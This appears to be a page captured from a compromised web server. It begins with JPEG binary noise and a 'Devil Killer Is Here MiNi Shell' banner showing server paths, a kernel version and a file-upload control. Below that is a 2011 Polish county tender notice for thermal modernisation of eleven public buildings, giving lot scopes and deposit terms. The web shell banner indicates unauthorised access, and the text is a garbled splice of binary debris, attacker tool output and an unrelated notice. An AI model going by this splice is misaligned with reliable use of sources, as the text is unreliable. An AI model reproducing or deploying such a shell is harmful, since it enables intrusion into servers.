JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110314/43644-N-2011.html

<p class="kh_header"><b>Drawsko Pomorskie: Wykonanie termomodernizacji 11 budynków użyteczności publicznej Powiatu Drawskiego</b><br>
<b>Numer ogłoszenia: 43644 - 2011; data zamieszczenia: 14.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Drawsku Pomorskim , Plac E. Orzeszkowej 3, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 094 3630788, faks 094 3630788.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatdrawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie termomodernizacji 11 budynków użyteczności publicznej Powiatu Drawskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu termomodernizacji, 11 budynków stanowiących własność Powiatu Drawskiego.  Roboty należy wykonać z zachowaniem istniejącej formy architektonicznej budynków , elewacji, detali i otworów.
2.	Przedmiot zamówienia należy wykonać zgodnie z opisami przedmiotu zamówienia, projektami budowlano - wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, zasadami sztuki budowlanej oraz obowiązującymi przepisami. 

Przedmiot zamówienia podzielony został na 4 zadania (części):

ZADANIE NR 1: Termomodernizacja: 
a)	budynku warsztatów Zespołu Szkół Zawodowych w Drawsku Pomorskim,
b)	budynku spawalni Zespołu Szkół Zawodowych w Drawsku Pomorskim,
c)	budynku Zespołu Szkół Zawodowych w Drawsku Pomorskim

Zakres dla budynku warsztatów
1Ocieplenie stropodachu pełnego wełną granulowaną wdmuchiwaną grubości 15 cm  
   (część dobudowana) oraz wykonanie izolacji przeciwwilgociowej papą termozgrzewalną
2. Ocieplenie stropodachu pełnego części głównej warstwą styropianu twardego w płytach  
    grubości 16 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną, ocieplenie 
    stropodachu niewentylowanego styropianem gr 15 cm na wierzchu dachu, izolacji 
    przeciwwilgociowej papą termozgrzewalną.
3. Ocieplenie ścian zewnętrznych grubości 38 cm (dobudówka) warstwą styropianu o 
    grubości 13 cm
4. Wymiana drewnianej, stalowej stolarki okiennej drzwi zewnętrznych i bram na stolarkę 
    jak w projekcie budowlanym.
5. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników 
    stalowych, płytowych z zaworami termostatycznymi, rurociągami miedzianymi

Zakres dla budynku spawalni
1. Ocieplenie stropodachu pełnego warstwą styropianu twardego w płytach grubości 16 cm 
    laminowanego oraz wykonanie pokrycia dachowego papą termozgrzewalną, 
2. Ocieplenie ścian zewnętrznych grubości 38 cm warstwą styropianu o grubości 13 cm
3. Wymiana stolarki okiennej drzwi zewnętrznych i bram jak w projekcie budowlanym z 
    zastosowaniem nowej stolarki energooszczędnej.
4. Modernizacja instalacji centralnego ogrzewania polegająca na wymianie istniejących 
    grzejników na stalowe, płytowe z zaworami termostatycznymi i rurociągami 
    miedzianymi, połączyć w całość i pozostawić istniejącą instalację miedzianą i grzejniki 
    płytowe w pomieszczeniu stacji diagnostycznej
Zakres dla budynku szkoły
1. Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14  
    cm (część dobudowana) oraz wykonanie izolacji przeciwwilgociowej papą 
    termozgrzewalną
2. Ocieplenie stropodachu niewentylowanego zaplecza sali sportowej warstwą styropianu 
     twardego grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3. Ocieplenie stropu pod nieogrzewanym poddaszem w części starej warstwą wełny 
    mineralnej w płytach grubości 16 cm oraz wykonanie pokrycia dachowego papą 
    termozgrzewalną
4. Ocieplenie ścian zewnętrznych grubości 38 cm sali sportowej warstwą styropianu o 
    grubości 13 cm
5. Ocieplenie ścian zewnętrznych z gazobetonu dobudowanej części dydaktycznej szkoły   
    warstwą styropianu grubości 12 cm metodą bezspoinową.
6. Wymiana drewnianej i stalowej stolarki okiennej na stolarkę z tworzyw sztucznych z  
    zastosowaniem nawiewników automatycznych montażem nowych parapetów.
7. Zamurowanie luksferów w sali sportowej.
8. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników 
   stalowych, płytowych z zaworami termostatycznymi, rurociągami miedzianymi, połączyć 
   w całość i pozostawić istniejącą instalację miedzianą i grzejniki płytowe
W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego).
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 1 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne.  


ZADANIE NR 2: Termomodernizacja:
a)	budynku Zespołu Szkól Ponadgimnazjalnych w Czaplinku przy ul. Parkowej 
b)	budynku Zespołu Szkól Ponadgimnazjalnych w Czaplinku przy ul. Grunwaldzkiej
c)	budynku Zespołu Szkól Ponadgimnazjalnych w Czaplinku przy ul. Wałeckiej

Zakres dla budynku przy ul Parkowej 
1. Ocieplenie stropodachu pełnego łącznika i dobudowanej części dydaktycznej warstwą  
    styropianu grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
2. Ocieplenie ścian warstwą styropianu wg projektu budowlanego budynek szkoły gr. 14 
    cm, łącznik i dobudowana część dydaktyczna gr. 13 cm
3. Ocieplenie stropu części nieogrzewanej poddasza szkoły warstwą wełny mineralnej 
    grubości 16 cm z wykonaniem ciągów komunikacyjnych
4. Wymiana stolarki okiennej na stolarkę z tworzyw sztucznych z zastosowaniem 
    nawiewników automatycznych (łącznik i stołówka oraz pozostałe niewymienione 
    okna budynku internatu)
5. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników 
     stalowych, płytowych z zaworami termostatycznymi, rurociągami z tworzyw 
     sztucznych, automatyką pogodową
6. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na jeden  
     kocioł gazowy o mocy 120 kW z regulatorem pogodowym, sterującym obiegiem 
     grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej wody 
     użytkowej. Zasilanie instalacji c.w.u. zasobnika o pojemności 700 litrów.  

Zakres dla budynku przy ul Grunwaldzkiej 
1 Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 
    cm (łącznik) oraz wykonanie pokrycia dachowego papą termozgrzewalną
2. Ocieplenie stropodachu pełnego zaplecza sali gimnastycznej warstwą styropianu 
     grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3. Ocieplenie ścian łącznika warstwą styropianu EPS-70 grubości 14 cm wg projektu 
    budowlanego
4. Ocieplenie stropu części nieogrzewanej budynku głównego warstwą wełny mineralnej 
    grubości 16 cm.
5. Wymiana stolarki okiennej na stolarkę z tworzyw sztucznych z zastosowaniem 
    nawiewników automatycznych (szkoła - tylko niewymienione okna), łącznik i sala  
    gimnastyczna)
6. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników 
    stalowych, płytowych z zaworami termostatycznymi, rurociągami z tworzyw sztucznych, 
    automatyką pogodową
7. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na jeden 
    nowoczesny kocioł gazowy o mocy 120 kW z regulatorem pogodowym, sterującym 
    obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej 
    wody użytkowej. Zasilanie instalacji c.w.u. zasobnika o pojemności 500 litrów. 
Zakres dla budynku przy ul Wałeckiej
1. Ocieplenie ścian zewnętrznych metodą bezspoinową grubości 14 cm warstwą styropianu zgodnie z  projektem budowlanym
2.Ocieplenie stropodachu pełnego 17 cm warstwą styropianu i wykonanie izolacji 
   przeciwwilgociowej papa termozgrzewalną. 
3.Wymiana stolarki okiennej, drzwiowej i bram garażowych jak w projekcie budowlanym  
   z zastosowaniem nowej stolarki energooszczędnej z nawiewnikami
4. Likwidacja wskazanych w projekcie naświetli z uzupełnieniem otworów płytami  
    żelbetonowymi.
5. Modernizacja instalacji c.o. obejmująca kompleksową wymianę instalacji c.o. na 
   hermetyczną o małej pojemności wodnej, wyposażonej w zawory termostatyczne i 
   zawory podpionowe zgodnie z dokumentacją techniczną, połączyć w całość starą 
   instalację z nowoprojektowaną.
W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego). 
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 2 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
                       Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne

ZADANIE NR 3: Termomodernizacja:
a)	Budynku Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim
b)	Budynku Zespołu Szkół Ponadgimnazjalnych w Złocieńcu
c)	Budynku Specjalnego Ośrodka Szkolno Wychowawczego w Bobrowie
Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim

1.  Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 
    cm (budynek III - łącznik) oraz wykonanie dwukrotnej izolacji przeciwwilgociowej    
    papą termozgrzewalną dachu.
2.Ocieplenie stropu pod nieogrzewanym poddaszem w części budynku dydaktycznego nr 
   1 warstwą wełny mineralnej w płytach grubości 17 cm, wykonanie komunikacji poddasza 
    za pomocą pomostów drewnianych wg dokumentacji projektowej, dodatkowo należy 
    ocieplić ścianę między klatką schodową a poddaszem nieużytkowym styropianem gr. 14 
    cm
3. Ocieplenie ścian zewnętrznych grubości 38 cm łącznika warstwą styropianu o grubości 
    14 cm wraz z warstwą wykończeniową elewacyjną  w postaci tynku cienkowarstwowego  
    akrylowego.
4. Wymiana części istniejącej stolarki okiennej na stolarkę z tworzyw sztucznych z  
    zastosowaniem nawiewników automatycznych montażem nowych parapetów.
5. Czyszczenie chemiczne i regulacja hydrauliczna istniejącej instalacji c.o. 

Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych w Złocieńcu

1. Ocieplenie stropodachu pełnego warstwą granulowanej wełny mineralnej grubości 14 cm 
    w nowej części szkoły.
2. Ocieplenie stropu pod nieogrzewanym poddaszem w części starej grubości 15 cm 
    warstwą wełny mineralnej w płytach ułożonych od strony poddasza
3. Ocieplenie stropu piwnic warstwą styropianu grubości 6 cm od spodu konstrukcji
4. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 13 cm
5. Wymiana stolarki okiennej i zewnętrznej drzwiowej jak w projekcie budowlanym z 
    zastosowaniem nowej stolarki energooszczędnej z nawiewnikami.
6. Modernizacja wewnętrznej instalacji centralnego ogrzewania polegająca na wymianie 
    istniejących grzejników na stalowe, płytowe z zaworami termostatycznymi i rurociągami 
    miedzianymi - dotyczy części wschodniej i południowej

Zakres dla budynku Specjalnego Ośrodka Szkolno Wychowawczego w Bobrowie

1.   Wymiana stolarki okiennej i zewnętrznej drzwiowej jak w projekcie budowlanym z 
    zastosowaniem nowej stolarki energooszczędnej z nawiewnikami.
2. Modernizacja wewnętrznej instalacji centralnego ogrzewania polegająca na wymianie 
    istniejących grzejników na stalowe, płytowe z zaworami termostatycznymi i rurociągami 
    miedzianymi.
3. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na dwa  
    kondensacyjne kotły gazowe o mocy 60 kW każdy z regulatorem pogodowym, 
    sterującym obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym 
    obiegiem ciepłej wody użytkowej. Zasilanie instalacji c.w.u. z dwóch zasobników o 
    pojemności 300 litrów każdy.
   4. Wykonanie izolacji ścian przyziemia przez odkopanie ścian od strony zewnętrznej do  
       głębokości fundamentów, oczyszczenie ścian z ziemii i odpadającego tynku, osuszenie  
        ścian, wykonanie dwuwarstwowej pionowej izolacji emulsją asfaltową, wykonanie 
        izolacji pionowej za pomocą folii kubełkowej, zasypanie ziemią, doprowadzenie 
        nawierzchni do stanu jak przed rozpoczęciem prac. Od wewnątrz odbić zmurszałe tynki, 
       osuszyć ściany, ponownie otynkować ściany.  Uwaga! Nie stosować osuszania  
       metodą iniekcji.

W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego). 
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 3 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
                       Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne


ZADANIE NR 4: Termomodernizacja
a)	Budynku Zespołu Szkół Ponadgimnazjalnych nr 1 w Drawsku Pomorskim
b)	Budynku Zespołu Szkół Ponadgimnazjalnych nr 2 w Drawsku Pomorskim
Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych nr 1 w Drawsku Pomorskim

1)	Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 cm (nowa część szkoły)
2)	Ocieplenie stropodachu pełnego sali sportowej warstwą styropianu grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3)	Ocieplenie stropodachu budynku głównego warstwą styropianu grubości 14 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną
4)	Ocieplenie ścian zewnętrznych gr 38 cm I i II piętra budynku dydaktycznego warstwą styropianu o grubości 14 cm
5)	Ocieplenie ścian zewnętrznych parteru części dydaktycznej, łącznika oraz ściany tylnej sali sportowej warstwą styropianu o grubości 13 cm 
6)	Wymiana części stolarki okiennej
7)	Wymiana stolarki drzwiowej na aluminiową ciepłą
8)	Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników stalowych dwupłytowych z zaworami termostatycznymi, rurociągami miedzianymi, automatyką pogodową

Zakres dla budynku Zespołu Szkół Ponadgimnazjalnych nr 2 w Drawsku Pomorskim

1. Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 
    cm (szkoła i łącznik)
2. Ocieplenie stropodachu pełnego zaplecza sali gimnastycznej warstwą styropianu 
    grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3. Ocieplenie ścian zewnętrznych gr 38 cm styropianem grubości 13 cm 
4. Ocieplenie stropodachu sali gimnastycznej warstwą styropianu grubości 13 cm oraz 
    wykonanie pokrycia dachowego papą termozgrzewalną
5. Wymiana drewnianej, zespolonej stolarki okiennej na stolarkę z tworzyw sztucznych z 
   zastosowaniem nawiewników automatycznych.
6. Wymiana stolarki drzwiowej na aluminiową ciepłą
7. Modernizacja instalacji centralnego ogrzewania polegająca na płukaniu chemicznym, 
   regulacji hydraulicznej instalacji, montażu zaworów termostatycznych. 
8. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na dwa  
    nowoczesne kotły gazowe o mocy łącznej 450 kW z regulatorem pogodowym, sterującym 
    obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej 
    wody użytkowej. Zasilanie instalacji c.w.u. z dwóch zasobników o pojemności 500 litrów 
     każdy. 

W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego). 
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 4 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
                       Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.23.10.00-4, 45.33.11.00-7, 45.42.10.00-4, 45.31.23.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium
Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
dla Zadania nr 1 - 50000,00 ( pięćdziesiąt tysięcy złotych)
dla Zadania nr 2 - 70000,00 ( siedemdziesiąt tysięcy złotych)
dla Zadania nr 3 - 50000,00 ( pięćdziesiąt tysięcy złotych)
dla Zadania nr 4 - 50000,00 ( pięćdziesiąt tysięcy złotych)
2.Forma wadium
Wadium może być wniesione w następujących formach  
a)pieniądzu, 
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych, 
e)poręczeniach  udzielanych  przez  podmioty,  o  których mowa  w  art.  6b  ust.  5  pkt  2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zm.) 

W przypadku składania  przez Wykonawcę wadium w  formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.  

3.Miejsce i sposób wniesienia wadium. 
  
1)Wadium  wnoszone  w  pieniądzu  należy  wpłacić  na  rachunek Zamawiającego:
76 1020 2847 0000 1202 0009 6859 z dopiskiem wadium  dla Zadania nr ......... dotyczące postępowania przetargowego na Wykonanie termomodernizacji 11 budynków użyteczności publicznej Powiatu Drawskiego. Do  oferty  należy  dołączyć  dokument  potwierdzający wniesienie wadium  przez wykonawcę tzn: oryginał  lub potwierdzoną za zgodność z oryginałem kopię polecenia przelewu na konto Zamawiającego  (warunek  konieczny,  ale  nie  wystarczający  do  stwierdzenia  przez Zamawiającego terminowego wniesienia wadium za pomocą przelewu bankowego). 
2)Wadium  wnoszone  w  postaci  poręczeń  i  gwarancji  bankowych,  poręczeń  kasy oszczędnościowo - kredytowej lub gwarancji ubezpieczeniowej należy załączyć do oferty w formie  kopii  dokumentu,  a  oryginał  złożyć w  oddzielnej  kopercie  oznaczonej  oryginał wadium, która będzie załączona do oferty (wewnątrz opakowania oferty) 

4.Termin wniesienia wadium  
 Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu  bankowego Zamawiający będzie uważał  za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew nie później niż na dzień przed upływem terminu składania ofert. 
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest warunkiem koniecznym ale nie wystarczającym do stwierdzenia przez zamawiającego terminowego wniesienia wadium przez wykonawcę. 

5.Zwrot wadium    
